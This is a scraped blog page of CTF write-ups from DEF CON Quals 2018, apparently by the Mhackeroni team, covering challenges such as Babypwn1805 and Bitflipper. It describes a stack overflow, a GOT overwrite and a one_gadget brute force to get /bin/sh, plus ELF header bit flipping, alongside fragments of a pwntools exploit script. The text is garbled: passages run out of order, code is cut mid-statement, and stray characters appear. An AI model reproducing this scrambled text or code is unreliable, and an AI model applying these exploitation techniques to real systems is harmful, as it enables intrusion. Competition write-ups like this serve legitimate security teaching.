Moreover, we can now try out various combinations of bit flips and check the new local MD5 with the remote MD5 to check if we correctly flipped the bits. The binaryīy computing the MD5 hash of the file we just got from the server we can verify that it is indeed the same binary which is run by the wrapper server-side. Indeed, flipping bits 128, 129 and 130, changing the byte at offset 0x10 from 0x03 to 0x04, works just fine! Now we have a binary we can disassemble and begin to work on. I would send you a core dump, but I could not find any in the current directoryĬool! This means that if we manage to flip some bits in the ELF header to make it become an ELF core file, the server will send us the entire binary! We are given access to a server that runs a packed ELF x86-64 program. warning ( "Executed stuff " + hex ( currentMagic ) + " : " + repr ( resp )) except EOFError : log. replace ( "Go \n ", "" ) if ( len ( resp ) > 0 ): log. recvuntil ( "Go \n " ) # if (len(resp)=0): send ( p16 ( currentMagic )) # nd(p64(0x7ffff7af1cde)) info ( "Current " + hex ( currentMagic )) sleep ( 0.1 ) conn. # currentMagic = random.choice(magics) + randPartĬurrentMagic = random. recvuntil ( "Go \n " ) if _name_ = '_main_' : while True : while True : try : connect () break except : continue while True : try : conn. sendline ( "'.format(solution, pow_hash(challenge, solution)))Ĭonn. SIGINT, signal_handler ) print ( 'Press Ctrl+C' ) def pow_hash ( challenge, solution ): return hashlib. Exploit (final iteration)įrom _future_ import print_function import sys import struct import hashlib from pwn import * from random import randint import signal import sys host = '' port = 31337 def signal_handler ( signal, frame ): print ( 'You pressed Ctrl+C!' ) sys. We managed to execute the echo command provided, so we refined the payload to cat the flag. We found that a few addresses returned some error related to /bin/sh having the wrong parameters, so we did another bruteforce, this time trying to jump few bytes before or after those addresses that returned a good output. Then we setup a bruteforce of the last two bytes of the read GOT entry, trying to hit a one_gadget (single address to call execv("/bin/sh/")). Overwriting the LSB we manage to call different functions when the offset is -56 from the variable in bss. Second step was to going backwards in the bss writing only 1 byte, trying to find where the entry for the read is on the GOT. We discovered leaking the env that there was a preloaded custom libc, probably different each time. Reading the provided C source file we found the two stack based 1024 bytes buffer overflow and the “write 8 bytes in a position relative to the bss asdf variable” possibility with the second read.Īt first we tried using the stack buffer overflow to ovewrite last byte of the pointer to the name string of the program. Hey folks! We really wanted to write-up this challenge for you – but we decided to let Adam Doupé personally explain it instead. IndexĪdamtune - Babypwn1805 - Bitflipper - Ddtek: Preview - Easy Pisy - Elastic Cloud Compute - ELF Crumble - Exzendtential-crisis - Flagsifier - Geckome - Ghettohackers: Throwback - It’s-a me! - Note Oriented Programming - Official - PHP Eval White-List - Ps-secure - Race Wars - Sbva - Shellql - TechSupport - WWW - You Already Know Comments section Adamtune This is the collection of writeups for the DEF CON Quals 2018 by the Mhackeroni team. Tweets by mHackeroni DEFCON CTF QUALS 2018 - Write ups
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |